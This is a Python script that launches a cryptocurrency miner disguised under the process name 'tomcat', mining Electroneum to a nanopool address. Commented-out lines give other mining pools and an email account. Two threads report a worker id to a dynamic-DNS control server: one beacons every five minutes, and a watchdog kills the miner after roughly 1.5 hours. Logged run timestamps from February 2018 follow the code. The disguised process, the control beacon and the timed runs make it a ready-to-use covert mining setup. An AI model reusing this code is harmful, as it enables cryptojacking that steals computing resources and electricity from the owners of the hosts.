import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:14:01.351743
#2018-02-17 16:01:01.736950
#2018-02-17 17:48:01.251200
#2018-02-17 19:35:07.905231
#2018-02-17 21:25:09.201502
#2018-02-17 23:09:01.523950
#2018-02-18 00:56:06.506236
#2018-02-18 02:44:06.424741
#2018-02-18 04:32:01.687564
#2018-02-18 06:23:05.750758
#2018-02-18 08:11:04.205556
#2018-02-18 09:57:05.023183
#2018-02-18 11:44:06.449756
#2018-02-18 13:30:06.917515
#2018-02-18 15:20:03.219338
#2018-02-18 17:09:07.107798
#2018-02-18 18:57:05.948466
#2018-02-18 20:44:04.911764
#2018-02-18 22:29:04.872792
#2018-02-19 00:18:07.446957
#2018-02-19 02:04:04.704173
#2018-02-19 03:50:04.269149
#2018-02-19 05:35:07.278159
#2018-02-19 07:23:01.823425
#2018-02-19 09:13:04.576709
#2018-02-19 11:01:09.452758
#2018-02-19 12:49:05.642366
#2018-02-19 14:37:01.587721
#2018-02-19 16:24:01.462961
#2018-02-19 18:10:08.025008
#2018-02-19 19:56:06.583272
#2018-02-19 21:42:08.066924
#2018-02-19 23:28:04.647128
#2018-02-20 01:14:01.269026
#2018-02-20 03:04:07.346877
#2018-02-20 04:52:06.620949
#2018-02-20 06:35:08.362478
#2018-02-20 08:20:07.816099
#2018-02-20 10:06:04.636159
#2018-02-20 11:50:08.018449
#2018-02-20 13:38:05.634502
#2018-02-20 15:23:04.526463
#2018-02-20 17:07:11.346225
#2018-02-20 18:56:10.342272
#2018-02-20 20:45:01.424245
#2018-02-20 22:30:08.630739
#2018-02-21 00:11:01.886765
#2018-02-21 01:56:08.192281
#2018-02-21 03:46:07.843355
#2018-02-21 05:35:01.420013
#2018-02-21 07:27:05.224699
#2018-02-21 09:11:07.938423
#2018-02-21 11:00:01.655548
#2018-02-21 12:47:12.952791
#2018-02-21 14:35:06.629086
#2018-02-21 16:21:10.406430
#2018-02-21 18:13:08.690561
#2018-02-21 19:58:02.150155
#2018-02-21 21:45:09.431193
#2018-02-21 23:34:01.198657
#2018-02-22 01:22:05.331111
#2018-02-22 03:10:07.625463
#2018-02-22 04:54:05.606459
#2018-02-22 06:39:07.968837
#2018-02-22 08:28:01.381435
#2018-02-22 10:14:06.498083
#2018-02-22 11:59:04.240474
#2018-02-22 13:45:11.148227
#2018-02-22 15:33:07.725834
#2018-02-22 17:20:12.386844
#2018-02-22 19:08:04.828991
#2018-02-22 20:59:07.789631
#2018-02-22 22:45:09.348644
#2018-02-23 00:33:06.685431
#2018-02-23 02:19:06.877492
#2018-02-23 04:09:01.839545
#2018-02-23 05:55:08.794446
#2018-02-23 07:35:04.892596
#2018-02-23 09:38:01.557938
#2018-02-23 11:42:01.504645
#2018-02-23 13:32:06.856092
#2018-02-23 15:19:08.108826
#2018-02-23 17:07:02.186347
#2018-02-23 18:38:05.933346
#2018-02-23 20:20:01.296142
#2018-02-23 21:54:06.910076
#2018-02-23 23:44:01.573930
#2018-02-24 01:37:05.540317
#2018-02-24 03:28:02.118298
#2018-02-24 05:13:08.194500
#2018-02-24 07:01:07.306502
#2018-02-24 08:36:05.309183
#2018-02-24 10:10:08.356827
#2018-02-24 11:57:05.047938
#2018-02-24 13:23:06.745075
#2018-02-24 14:57:06.148802
#2018-02-24 16:32:02.209334
#2018-02-24 18:05:08.466840
#2018-02-24 19:35:09.175416
#2018-02-24 21:11:01.492405
#2018-02-24 23:15:06.598058
#2018-02-25 03:24:06.149739
#2018-02-25 07:01:06.318896